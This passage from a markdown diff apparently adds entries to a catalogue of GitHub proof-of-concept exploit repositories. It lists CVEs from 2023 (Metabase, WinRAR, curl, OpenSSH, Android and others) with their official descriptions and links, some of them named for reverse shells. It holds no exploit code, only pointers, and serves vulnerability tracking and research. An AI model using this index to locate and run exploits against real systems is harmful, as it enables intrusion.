+A logged in user may elevate its permissions by abusing a Time-of-Check to Time-of-Use (TOCTOU) race condition. When a particular process flow is initiated, an attacker can exploit this condition to gain unauthorized elevated privileges on the affected system.
+
+
+- [ewilded/CVE-2023-38041-POC](https://github.com/ewilded/CVE-2023-38041-POC)
+
+### CVE-2023-38120 (2024-05-03)
+
+Adtran SR400ac ping Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adtran SR400ac routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the ping command, which is available over JSON-RPC. A crafted host parameter can trigger execution of a system call composed from a user-supplied string. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20525.
+
+
+- [warber0x/CVE-2023-38120](https://github.com/warber0x/CVE-2023-38120)
+
+### CVE-2023-38146 (2023-09-12)
+
+Windows Themes Remote Code Execution Vulnerability
+
+
+- [exploits-forsale/themebleed](https://github.com/exploits-forsale/themebleed)
+- [Jnnshschl/CVE-2023-38146](https://github.com/Jnnshschl/CVE-2023-38146)
+- [Durge5/ThemeBleedPy](https://github.com/Durge5/ThemeBleedPy)
+
+### CVE-2023-38408 (2023-07-20)
+
+The PKCS#11 feature in ssh-agent in OpenSSH before 9.3p2 has an insufficiently trustworthy search path, leading to remote code execution if an agent is forwarded to an attacker-controlled system. (Code in /usr/lib is not necessarily safe for loading into ssh-agent.) NOTE: this issue exists because of an incomplete fix for CVE-2016-10009.
+
+
+- [kali-mx/CVE-2023-38408](https://github.com/kali-mx/CVE-2023-38408)
+- [LucasPDiniz/CVE-2023-38408](https://github.com/LucasPDiniz/CVE-2023-38408)
+- [classic130/CVE-2023-38408](https://github.com/classic130/CVE-2023-38408)
+- [wxrdnx/CVE-2023-38408](https://github.com/wxrdnx/CVE-2023-38408)
+
+### CVE-2023-38434 (2023-07-18)
+
+xHTTP 72f812d has a double free in close_connection in xhttp.c via a malformed HTTP request method.
+
+
+- [Halcy0nic/CVE-2023-38434](https://github.com/Halcy0nic/CVE-2023-38434)
+
+### CVE-2023-38490 (2023-07-27)
+
+Kirby is a content management system. A vulnerability in versions prior to 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and 3.9.6 only affects Kirby sites that use the `Xml` data handler (e.g. `Data::decode($string, 'xml')`) or the `Xml::parse()` method in site or plugin code. The Kirby core does not use any of the affected methods.\n\nXML External Entities (XXE) is a little used feature in the XML markup language that allows to include data from external files in an XML structure. If the name of the external file can be controlled by an attacker, this becomes a vulnerability that can be abused for various system impacts like the disclosure of internal or confidential data that is stored on the server (arbitrary file disclosure) or to perform network requests on behalf of the server (server-side request forgery, SSRF).\n\nKirby's `Xml::parse()` method used PHP's `LIBXML_NOENT` constant, which enabled the processing of XML external entities during the parsing operation. The `Xml::parse()` method is used in the `Xml` data handler (e.g. `Data::decode($string, 'xml')`). Both the vulnerable method and the data handler are not used in the Kirby core. However they may be used in site or plugin code, e.g. to parse RSS feeds or other XML files. If those files are of an external origin (e.g. uploaded by a user or retrieved from an external URL), attackers may be able to include an external entity in the XML file that will then be processed in the parsing process. Kirby sites that don't use XML parsing in site or plugin code are *not* affected.\n\nThe problem has been patched in Kirby 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and 3.9.6. In all of the mentioned releases, the maintainers have removed the `LIBXML_NOENT` constant as processing of external entities is out of scope of the parsing logic. This protects all uses of the method against the described vulnerability.
+
+
+- [Acceis/exploit-CVE-2023-38490](https://github.com/Acceis/exploit-CVE-2023-38490)
+
+### CVE-2023-38497 (2023-08-04)
+
+Cargo downloads the Rust project’s dependencies and compiles the project. Cargo prior to version 0.72.2, bundled with Rust prior to version 1.71.1, did not respect the umask when extracting crate archives on UNIX-like systems. If the user downloaded a crate containing files writeable by any local user, another local user could exploit this to change the source code compiled and executed by the current user. To prevent existing cached extractions from being exploitable, the Cargo binary version 0.72.2 included in Rust 1.71.1 or later will purge caches generated by older Cargo versions automatically. As a workaround, configure one's system to prevent other local users from accessing the Cargo directory, usually located in `~/.cargo`.
+
+
+- [lucas-cauhe/cargo-perm](https://github.com/lucas-cauhe/cargo-perm)
+
+### CVE-2023-38499 (2023-07-25)
+
+TYPO3 is an open source PHP based web content management system. Starting in version 9.4.0 and prior to versions 9.5.42 ELTS, 10.4.39 ELTS, 11.5.30, and 12.4.4, in multi-site scenarios, enumerating the HTTP query parameters `id` and `L` allowed out-of-scope access to rendered content in the website frontend. For instance, this allowed visitors to access content of an internal site by adding handcrafted query parameters to the URL of a site that was publicly available. TYPO3 versions 9.5.42 ELTS, 10.4.39 ELTS, 11.5.30, 12.4.4 fix the problem.
+
+
+- [miguelc49/CVE-2023-38499-2](https://github.com/miguelc49/CVE-2023-38499-2)
+- [miguelc49/CVE-2023-38499-1](https://github.com/miguelc49/CVE-2023-38499-1)
+- [miguelc49/CVE-2023-38499-3](https://github.com/miguelc49/CVE-2023-38499-3)
+
+### CVE-2023-38545 (2023-10-18)
+
+This flaw makes curl overflow a heap based buffer in the SOCKS5 proxy\nhandshake.\n\nWhen curl is asked to pass along the host name to the SOCKS5 proxy to allow\nthat to resolve the address instead of it getting done by curl itself, the\nmaximum length that host name can be is 255 bytes.\n\nIf the host name is detected to be longer, curl switches to local name\nresolving and instead passes on the resolved address only. Due to this bug,\nthe local variable that means "let the host resolve the name" could get the\nwrong value during a slow SOCKS5 handshake, and contrary to the intention,\ncopy the too long host name to the target buffer instead of copying just the\nresolved address there.\n\nThe target buffer being a heap based buffer, and the host name coming from the\nURL that curl has been told to operate with.\n
+
+
+- [UTsweetyfish/CVE-2023-38545](https://github.com/UTsweetyfish/CVE-2023-38545)
+- [imfht/CVE-2023-38545](https://github.com/imfht/CVE-2023-38545)
+- [fatmo666/CVE-2023-38545-libcurl-SOCKS5-heap-buffer-overflow](https://github.com/fatmo666/CVE-2023-38545-libcurl-SOCKS5-heap-buffer-overflow)
+- [vanigori/CVE-2023-38545-sample](https://github.com/vanigori/CVE-2023-38545-sample)
+- [dbrugman/CVE-2023-38545-POC](https://github.com/dbrugman/CVE-2023-38545-POC)
+- [bcdannyboy/CVE-2023-38545](https://github.com/bcdannyboy/CVE-2023-38545)
+- [d0rb/CVE-2023-38545](https://github.com/d0rb/CVE-2023-38545)
+- [Yang-Shun-Yu/CVE-2023-38545](https://github.com/Yang-Shun-Yu/CVE-2023-38545)
+- [nphuang/NS-Project-2024-Spring](https://github.com/nphuang/NS-Project-2024-Spring)
+
+### CVE-2023-38571 (2023-07-28)
+
+This issue was addressed with improved validation of symlinks. This issue is fixed in macOS Big Sur 11.7.9, macOS Monterey 12.6.8, macOS Ventura 13.5. An app may be able to bypass Privacy preferences.
+
+
+- [gergelykalman/CVE-2023-38571-a-macOS-TCC-bypass-in-Music-and-TV](https://github.com/gergelykalman/CVE-2023-38571-a-macOS-TCC-bypass-in-Music-and-TV)
+
+### CVE-2023-38609 (2023-07-28)
+
+An injection issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13.5. An app may be able to bypass certain Privacy preferences.
+
+
+- [mc-17/CVE-2023-38609](https://github.com/mc-17/CVE-2023-38609)
+
+### CVE-2023-38632 (2023-07-21)
+
+async-sockets-cpp through 0.3.1 has a stack-based buffer overflow in tcpsocket.hpp when processing malformed TCP packets.
+
+
+- [Halcy0nic/CVE-2023-38632](https://github.com/Halcy0nic/CVE-2023-38632)
+
+### CVE-2023-38646 (2023-07-21)
+
+Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.
+
+
+- [adriyansyah-mf/CVE-2023-38646--Metabase-](https://github.com/adriyansyah-mf/CVE-2023-38646--Metabase-)
+- [Pumpkin-Garden/POC_Metabase_CVE-2023-38646](https://github.com/Pumpkin-Garden/POC_Metabase_CVE-2023-38646)
+- [0xrobiul/CVE-2023-38646](https://github.com/0xrobiul/CVE-2023-38646)
+- [Chocapikk/CVE-2023-38646](https://github.com/Chocapikk/CVE-2023-38646)
+- [Xuxfff/CVE-2023-38646-Poc](https://github.com/Xuxfff/CVE-2023-38646-Poc)
+- [securezeron/CVE-2023-38646](https://github.com/securezeron/CVE-2023-38646)
+- [raytheon0x21/CVE-2023-38646](https://github.com/raytheon0x21/CVE-2023-38646)
+- [Zenmovie/CVE-2023-38646](https://github.com/Zenmovie/CVE-2023-38646)
+- [shamo0/CVE-2023-38646-PoC](https://github.com/shamo0/CVE-2023-38646-PoC)
+- [fidjiw/CVE-2023-38646-POC](https://github.com/fidjiw/CVE-2023-38646-POC)
+- [Any3ite/cve-2023-38646-metabase-ReverseShell](https://github.com/Any3ite/cve-2023-38646-metabase-ReverseShell)
+- [robotmikhro/CVE-2023-38646](https://github.com/robotmikhro/CVE-2023-38646)
+- [kh4sh3i/CVE-2023-38646](https://github.com/kh4sh3i/CVE-2023-38646)
+- [joaoviictorti/CVE-2023-38646](https://github.com/joaoviictorti/CVE-2023-38646)
+- [yxl2001/CVE-2023-38646](https://github.com/yxl2001/CVE-2023-38646)
+- [alexandre-pecorilla/CVE-2023-38646](https://github.com/alexandre-pecorilla/CVE-2023-38646)
+- [CN016/Metabase-H2-CVE-2023-38646-](https://github.com/CN016/Metabase-H2-CVE-2023-38646-)
+- [Boogipop/MetabaseRceTools](https://github.com/Boogipop/MetabaseRceTools)
+- [SUT0L/CVE-2023-38646](https://github.com/SUT0L/CVE-2023-38646)
+- [nickswink/CVE-2023-38646](https://github.com/nickswink/CVE-2023-38646)
+- [passwa11/CVE-2023-38646](https://github.com/passwa11/CVE-2023-38646)
+- [threatHNTR/CVE-2023-38646](https://github.com/threatHNTR/CVE-2023-38646)
+- [asepsaepdin/CVE-2023-38646](https://github.com/asepsaepdin/CVE-2023-38646)
+- [Pyr0sec/CVE-2023-38646](https://github.com/Pyr0sec/CVE-2023-38646)
+- [birdm4nw/CVE-2023-38646](https://github.com/birdm4nw/CVE-2023-38646)
+- [AnvithLobo/CVE-2023-38646](https://github.com/AnvithLobo/CVE-2023-38646)
+- [Red4mber/CVE-2023-38646](https://github.com/Red4mber/CVE-2023-38646)
+- [junnythemarksman/CVE-2023-38646](https://github.com/junnythemarksman/CVE-2023-38646)
+- [Mrunalkaran/CVE-2023-38646](https://github.com/Mrunalkaran/CVE-2023-38646)
+- [j0yb0y0h/CVE-2023-38646](https://github.com/j0yb0y0h/CVE-2023-38646)
+- [Ego1stoo/CVE-2023-38646](https://github.com/Ego1stoo/CVE-2023-38646)
+- [0utl4nder/Another-Metabase-RCE-CVE-2023-38646](https://github.com/0utl4nder/Another-Metabase-RCE-CVE-2023-38646)
+- [Shisones/MetabaseRCE_CVE-2023-38646](https://github.com/Shisones/MetabaseRCE_CVE-2023-38646)
+- [acesoyeo/METABASE-RCE-CVE-2023-38646-](https://github.com/acesoyeo/METABASE-RCE-CVE-2023-38646-)
+- [UserConnecting/Exploit-CVE-2023-38646-Metabase](https://github.com/UserConnecting/Exploit-CVE-2023-38646-Metabase)
+- [xchg-rax-rax/CVE-2023-38646](https://github.com/xchg-rax-rax/CVE-2023-38646)
+
+### CVE-2023-38743 (2023-09-11)
+
+Zoho ManageEngine ADManager Plus before Build 7200 allows admin users to execute commands on the host machine.
+
+
+- [PetrusViet/CVE-2023-38743](https://github.com/PetrusViet/CVE-2023-38743)
+
+### CVE-2023-38820
+- [TraiLeR2/DLL-Planting-Slack-4.33.73-CVE-2023-38820](https://github.com/TraiLeR2/DLL-Planting-Slack-4.33.73-CVE-2023-38820)
+
+### CVE-2023-38821
+- [TraiLeR2/CoD-MW-Warzone-2---CVE-2023-38821](https://github.com/TraiLeR2/CoD-MW-Warzone-2---CVE-2023-38821)
+
+### CVE-2023-38822
+- [TraiLeR2/Corsair---DLL-Planting-CVE-2023-38822](https://github.com/TraiLeR2/Corsair---DLL-Planting-CVE-2023-38822)
+
+### CVE-2023-38829 (2023-09-11)
+
+An issue in NETIS SYSTEMS WF2409E v.3.6.42541 allows a remote attacker to execute arbitrary code via the ping and traceroute functions of the diagnostic tools component in the admin management interface.
+
+
+- [adhikara13/CVE-2023-38829-NETIS-WF2409E](https://github.com/adhikara13/CVE-2023-38829-NETIS-WF2409E)
+
+### CVE-2023-38831 (2023-08-23)
+
+RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the benign file, and the contents of the folder (which may include executable content) are processed during an attempt to access only the benign file. This was exploited in the wild in April through October 2023.
+
+
+- [BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc](https://github.com/BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc)
+- [b1tg/CVE-2023-38831-winrar-exploit](https://github.com/b1tg/CVE-2023-38831-winrar-exploit)
+- [IR-HuntGuardians/CVE-2023-38831-HUNT](https://github.com/IR-HuntGuardians/CVE-2023-38831-HUNT)
+- [Garck3h/cve-2023-38831](https://github.com/Garck3h/cve-2023-38831)
+- [ignis-sec/CVE-2023-38831-RaRCE](https://github.com/ignis-sec/CVE-2023-38831-RaRCE)
+- [HDCE-inc/CVE-2023-38831](https://github.com/HDCE-inc/CVE-2023-38831)
+- [Maalfer/CVE-2023-38831_ReverseShell_Winrar-RCE](https://github.com/Maalfer/CVE-2023-38831_ReverseShell_Winrar-RCE)
+- [knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831](https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831)
+- [akhomlyuk/cve-2023-38831](https://github.com/akhomlyuk/cve-2023-38831)
+- [PascalAsch/CVE-2023-38831-KQL](https://github.com/PascalAsch/CVE-2023-38831-KQL)
+- [ahmed-fa7im/CVE-2023-38831-winrar-expoit-simple-Poc](https://github.com/ahmed-fa7im/CVE-2023-38831-winrar-expoit-simple-Poc)
+- [thegr1ffyn/CVE-2023-38831](https://github.com/thegr1ffyn/CVE-2023-38831)
+- [MortySecurity/CVE-2023-38831-Exploit-and-Detection](https://github.com/MortySecurity/CVE-2023-38831-Exploit-and-Detection)
+- [z3r0sw0rd/CVE-2023-38831-PoC](https://github.com/z3r0sw0rd/CVE-2023-38831-PoC)
+- [sh770/CVE-2023-38831](https://github.com/sh770/CVE-2023-38831)
+- [BeniB3astt/CVE-2023-38831_ReverseShell_Winrar](https://github.com/BeniB3astt/CVE-2023-38831_ReverseShell_Winrar)
+- [MorDavid/CVE-2023-38831-Winrar-Exploit-Generator-POC](https://github.com/MorDavid/CVE-2023-38831-Winrar-Exploit-Generator-POC)
+- [Mich-ele/CVE-2023-38831-winrar](https://github.com/Mich-ele/CVE-2023-38831-winrar)
+- [asepsaepdin/CVE-2023-38831](https://github.com/asepsaepdin/CVE-2023-38831)
+- [K3rnel-Dev/WinrarExploit](https://github.com/K3rnel-Dev/WinrarExploit)
+- [Fa1c0n35/CVE-2023-38831-winrar-exploit](https://github.com/Fa1c0n35/CVE-2023-38831-winrar-exploit)
+- [xaitax/WinRAR-CVE-2023-38831](https://github.com/xaitax/WinRAR-CVE-2023-38831)
+- [GOTonyGO/CVE-2023-38831-winrar](https://github.com/GOTonyGO/CVE-2023-38831-winrar)
+- [Malwareman007/CVE-2023-38831](https://github.com/Malwareman007/CVE-2023-38831)
+- [ameerpornillos/CVE-2023-38831-WinRAR-Exploit](https://github.com/ameerpornillos/CVE-2023-38831-WinRAR-Exploit)
+- [IMHarman/CVE-2023-38831](https://github.com/IMHarman/CVE-2023-38831)
+- [an040702/CVE-2023-38831](https://github.com/an040702/CVE-2023-38831)
+- [elefantesagradodeluzinfinita/cve-2023-38831](https://github.com/elefantesagradodeluzinfinita/cve-2023-38831)
+- [malvika-thakur/CVE-2023-38831](https://github.com/malvika-thakur/CVE-2023-38831)
+- [ruycr4ft/CVE-2023-38831](https://github.com/ruycr4ft/CVE-2023-38831)
+- [Nielk74/CVE-2023-38831](https://github.com/Nielk74/CVE-2023-38831)
+- [kehrijksen/CVE-2023-38831](https://github.com/kehrijksen/CVE-2023-38831)
+- [h3xecute/SideCopy-Exploits-CVE-2023-38831](https://github.com/h3xecute/SideCopy-Exploits-CVE-2023-38831)
+- [s4m98/winrar-cve-2023-38831-poc-gen](https://github.com/s4m98/winrar-cve-2023-38831-poc-gen)
+- [xk-mt/WinRAR-Vulnerability-recurrence-tutorial](https://github.com/xk-mt/WinRAR-Vulnerability-recurrence-tutorial)
+- [MyStuffYT/CVE-2023-38831-POC](https://github.com/MyStuffYT/CVE-2023-38831-POC)
+- [80r1ng/CVE-2023-38831-EXP](https://github.com/80r1ng/CVE-2023-38831-EXP)
+- [SpamixOfficial/CVE-2023-38831](https://github.com/SpamixOfficial/CVE-2023-38831)
+- [r1yaz/winDED](https://github.com/r1yaz/winDED)
+- [youmulijiang/evil-winrar](https://github.com/youmulijiang/evil-winrar)
+- [solomon12354/VolleyballSquid-----CVE-2023-38831-and-Bypass-UAC](https://github.com/solomon12354/VolleyballSquid-----CVE-2023-38831-and-Bypass-UAC)
+- [RomainBayle08/CVE-2023-38831](https://github.com/RomainBayle08/CVE-2023-38831)
+- [imbyter/imbyter-WinRAR_CVE-2023-38831](https://github.com/imbyter/imbyter-WinRAR_CVE-2023-38831)
+- [UnHackerEnCapital/PDFernetRemotelo](https://github.com/UnHackerEnCapital/PDFernetRemotelo)
+- [Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784](https://github.com/Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784)
+
+### CVE-2023-38836 (2023-08-21)
+
+File Upload vulnerability in BoidCMS v.2.0.0 allows a remote attacker to execute arbitrary code by adding a GIF header to bypass MIME type checks.
+
+
+- [1337kid/CVE-2023-38836](https://github.com/1337kid/CVE-2023-38836)
+
+### CVE-2023-38890 (2023-08-18)
+
+Online Shopping Portal Project 3.1 allows remote attackers to execute arbitrary SQL commands/queries via the login form, leading to unauthorized access and potential data manipulation. This vulnerability arises due to insufficient validation of user-supplied input in the username field, enabling SQL Injection attacks.
+
+
+- [akshadjoshi/CVE-2023-38890](https://github.com/akshadjoshi/CVE-2023-38890)
+
+### CVE-2023-38891 (2023-09-14)
+
+SQL injection vulnerability in Vtiger CRM v.7.5.0 allows a remote authenticated attacker to escalate privileges via the getQueryColumnsList function in ReportRun.php.
+
+
+- [jselliott/CVE-2023-38891](https://github.com/jselliott/CVE-2023-38891)
+
+### CVE-2023-39062 (2023-08-28)
+
+Cross Site Scripting vulnerability in Spipu HTML2PDF before v.5.2.8 allows a remote attacker to execute arbitrary code via a crafted script to the forms.php.
+
+
+- [afine-com/CVE-2023-39062](https://github.com/afine-com/CVE-2023-39062)
+
+### CVE-2023-39063 (2023-09-11)
+
+Buffer Overflow vulnerability in RaidenFTPD 2.4.4005 allows a local attacker to execute arbitrary code via the Server name field of the Step by step setup wizard.
+
+
+- [AndreGNogueira/CVE-2023-39063](https://github.com/AndreGNogueira/CVE-2023-39063)
+
+### CVE-2023-39115 (2023-08-16)
+
+install/aiz-uploader/upload in Campcodes Online Matrimonial Website System Script 3.3 allows XSS via a crafted SVG document.
+
+
+- [Raj789-sec/CVE-2023-39115](https://github.com/Raj789-sec/CVE-2023-39115)
+
+### CVE-2023-39144 (2023-08-03)
+
+Element55 KnowMore appliances version 21 and older was discovered to store passwords in plaintext.
+
+
+- [cduram/CVE-2023-39144](https://github.com/cduram/CVE-2023-39144)
+
+### CVE-2023-39320 (2023-09-08)
+
+The go.mod toolchain directive, introduced in Go 1.21, can be leveraged to execute scripts and binaries relative to the root of the module when the "go" command was executed within the module. This applies to modules downloaded using the "go" command from the module proxy, as well as modules downloaded directly using VCS software.
+
+
+- [ayrustogaru/cve-2023-39320](https://github.com/ayrustogaru/cve-2023-39320)
+
+### CVE-2023-39362 (2023-09-05)
+
+Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server. The `lib/snmp.php` file has a set of functions, with similar behavior, that accept in input some variables and place them into an `exec` call without a proper escape or validation. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
+
+
+- [m3ssap0/cacti-rce-snmp-options-vulnerable-application](https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application)
+- [jakabakos/CVE-2023-39362-cacti-snmp-command-injection-poc](https://github.com/jakabakos/CVE-2023-39362-cacti-snmp-command-injection-poc)
+
+### CVE-2023-39526 (2023-08-07)
+
+PrestaShop is an open source e-commerce web application. Versions prior to 1.7.8.10, 8.0.5, and 8.1.1 are vulnerable to remote code execution through SQL injection and arbitrary file write in the back office. Versions 1.7.8.10, 8.0.5, and 8.1.1 contain a patch. There are no known workarounds.
+
+
+- [dnkhack/fixcve2023_39526_2023_39527](https://github.com/dnkhack/fixcve2023_39526_2023_39527)
+
+### CVE-2023-39539 (2023-12-06)
+
+\nAMI AptioV contains a vulnerability in BIOS where a User may cause an unrestricted upload of a PNG Logo file with dangerous type by Local access. A successful exploit of this vulnerability may lead to a loss of Confidentiality, Integrity, and/or Availability. \n\n\n\n\n\n
+
+
+- [AdamWen230/CVE-2023-39539-PoC](https://github.com/AdamWen230/CVE-2023-39539-PoC)
+
+### CVE-2023-39707 (2023-08-25)
+
+A stored cross-site scripting (XSS) vulnerability in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Add Expense parameter under the Expense section.
+
+
+- [Arajawat007/CVE-2023-39707](https://github.com/Arajawat007/CVE-2023-39707)
+
+### CVE-2023-39708 (2023-08-28)
+
+A stored cross-site scripting (XSS) vulnerability in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Add New parameter under the New Buy section.
+
+
+- [Arajawat007/CVE-2023-39708](https://github.com/Arajawat007/CVE-2023-39708)
+
+### CVE-2023-39709 (2023-08-28)
+
+Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add Member section.
+
+
+- [Arajawat007/CVE-2023-39709](https://github.com/Arajawat007/CVE-2023-39709)
+
+### CVE-2023-39710 (2023-09-01)
+
+Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add Customer section.
+
+
+- [Arajawat007/CVE-2023-39710](https://github.com/Arajawat007/CVE-2023-39710)
+
+### CVE-2023-39711 (2023-09-07)
+
+Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Subtotal and Paidbill parameters under the Add New Put section.
+
+
+- [Arajawat007/CVE-2023-39711](https://github.com/Arajawat007/CVE-2023-39711)
+
+### CVE-2023-39712 (2023-09-08)
+
+Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add New Put section.
+
+
+- [Arajawat007/CVE-2023-39712](https://github.com/Arajawat007/CVE-2023-39712)
+
+### CVE-2023-39714 (2023-09-01)
+
+Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add New Member section.
+
+
+- [Arajawat007/CVE-2023-39714](https://github.com/Arajawat007/CVE-2023-39714)
+
+### CVE-2023-39725
+- [anky-123/CVE-2023-39725](https://github.com/anky-123/CVE-2023-39725)
+
+### CVE-2023-40000 (2024-04-16)
+
+Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiteSpeed Technologies LiteSpeed Cache allows Stored XSS.This issue affects LiteSpeed Cache: from n/a through 5.7.\n\n
+
+
+- [rxerium/CVE-2023-40000](https://github.com/rxerium/CVE-2023-40000)
+- [quantiom/litespeed-cache-xss-poc](https://github.com/quantiom/litespeed-cache-xss-poc)
+- [iveresk/cve-2023-40000](https://github.com/iveresk/cve-2023-40000)
+
+### CVE-2023-40028 (2023-08-15)
+
+Ghost is an open source content management system. Versions prior to 5.59.1 are subject to a vulnerability which allows authenticated users to upload files that are symlinks. This can be exploited to perform an arbitrary file read of any file on the host operating system. Site administrators can check for exploitation of this issue by looking for unknown symlinks within Ghost's `content/` folder. Version 5.59.1 contains a fix for this issue. All users are advised to upgrade. There are no known workarounds for this vulnerability.
+
+
+- [0xyassine/CVE-2023-40028](https://github.com/0xyassine/CVE-2023-40028)
+
+### CVE-2023-40031 (2023-08-25)
+
+Notepad++ is a free and open-source source code editor. Versions 8.5.6 and prior are vulnerable to heap buffer write overflow in `Utf8_16_Read::convert`. This issue may lead to arbitrary code execution. As of time of publication, no known patches are available in existing versions of Notepad++.
+
+
+- [webraybtl/CVE-2023-40031](https://github.com/webraybtl/CVE-2023-40031)
+
+### CVE-2023-40037 (2023-08-18)
+
+Apache NiFi 1.21.0 through 1.23.0 support JDBC and JNDI JMS access in several Processors and Controller Services with connection URL validation that does not provide sufficient protection against crafted inputs. An authenticated and authorized user can bypass connection URL validation using custom input formatting. The resolution enhances connection URL validation and introduces validation for additional related properties. Upgrading to Apache NiFi 1.23.1 is the recommended mitigation.\n
+
+
+- [mbadanoiu/CVE-2023-40037](https://github.com/mbadanoiu/CVE-2023-40037)
+
+### CVE-2023-40044 (2023-09-27)
+
+\nIn WS_FTP Server versions prior to 8.7.4 and 8.8.2, a pre-authenticated attacker could leverage a .NET deserialization vulnerability in the Ad Hoc Transfer module to execute remote commands on the underlying WS_FTP Server operating system. \n\n
+
+
+- [kenbuckler/WS_FTP-CVE-2023-40044](https://github.com/kenbuckler/WS_FTP-CVE-2023-40044)
+
+### CVE-2023-40084 (2023-12-04)
+
+In run of MDnsSdListener.cpp, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
+
+
+- [Trinadh465/platform_system_netd_AOSP10_r33_CVE-2023-40084](https://github.com/Trinadh465/platform_system_netd_AOSP10_r33_CVE-2023-40084)
+
+### CVE-2023-40109 (2024-02-15)
+
+In createFromParcel of UsbConfiguration.java, there is a possible background activity launch (BAL) due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.
+
+
+- [uthrasri/CVE-2023-40109](https://github.com/uthrasri/CVE-2023-40109)
+
+### CVE-2023-40121 (2023-10-27)
+
+In appendEscapedSQLString of DatabaseUtils.java, there is a possible SQL injection due to unsafe deserialization. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.
+
+
+- [hshivhare67/platform_framework_base_AOSP6_r22_CVE-2023-40121](https://github.com/hshivhare67/platform_framework_base_AOSP6_r22_CVE-2023-40121)
+- [hshivhare67/platform_framework_base_android-4.2.2_r1_CVE-2023-40121](https://github.com/hshivhare67/platform_framework_base_android-4.2.2_r1_CVE-2023-40121)
+
+### CVE-2023-40127 (2023-10-27)
+
+In multiple locations, there is a possible way to access screenshots due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
+
+
+- [Trinadh465/platform_packages_providers_MediaProvider_CVE-2023-40127](https://github.com/Trinadh465/platform_packages_providers_MediaProvider_CVE-2023-40127)
+- [Trinadh465/CVE-2023-40127](https://github.com/Trinadh465/CVE-2023-40127)
+
+### CVE-2023-40133 (2023-10-27)
+
+In multiple locations of DialogFillUi.java, there is a possible way to view another user's images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
+
+
+- [uthrasri/frame_CVE-2023-40133_136_137](https://github.com/uthrasri/frame_CVE-2023-40133_136_137)
+
+### CVE-2023-40140 (2023-10-27)
+
+In android_view_InputDevice_create of android_view_InputDevice.cpp, there is a possible way to execute arbitrary code due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
+
+
+- [hshivhare67/platform_frameworks_base_android-4.2.2_r1_CVE-2023-40140](https://github.com/hshivhare67/platform_frameworks_base_android-4.2.2_r1_CVE-2023-40140)
+- [hshivhare67/platform_frameworks_base_AOSP6_r22_CVE-2023-40140](https://github.com/hshivhare67/platform_frameworks_base_AOSP6_r22_CVE-2023-40140)
+
+### CVE-2023-40275 (2024-03-19)
+
+An issue was discovered in OpenClinic GA 5.247.01. It allows retrieval of patient lists via queries such as findFirstname= to _common/search/searchByAjax/patientslistShow.jsp.
+
+
+- [BugBountyHunterCVE/CVE-2023-40275](https://github.com/BugBountyHunterCVE/CVE-2023-40275)
+
+### CVE-2023-40276 (2024-03-19)
+
+An issue was discovered in OpenClinic GA 5.247.01. An Unauthenticated File Download vulnerability has been discovered in pharmacy/exportFile.jsp.
+
+
+- [BugBountyHunterCVE/CVE-2023-40276](https://github.com/BugBountyHunterCVE/CVE-2023-40276)
+
+### CVE-2023-40277 (2024-03-19)
+
+An issue was discovered in OpenClinic GA 5.247.01. A Reflected Cross-Site Scripting (XSS) vulnerability has been discovered in the login.jsp message parameter.
+
+
+- [BugBountyHunterCVE/CVE-2023-40277](https://github.com/BugBountyHunterCVE/CVE-2023-40277)
+
+### CVE-2023-40278 (2024-03-19)
+
+An issue was discovered in OpenClinic GA 5.247.01. An Information Disclosure vulnerability has been identified in the printAppointmentPdf.jsp component of OpenClinic GA. By changing the AppointmentUid parameter, an attacker can determine whether a specific appointment exists based on the error message.
+
+
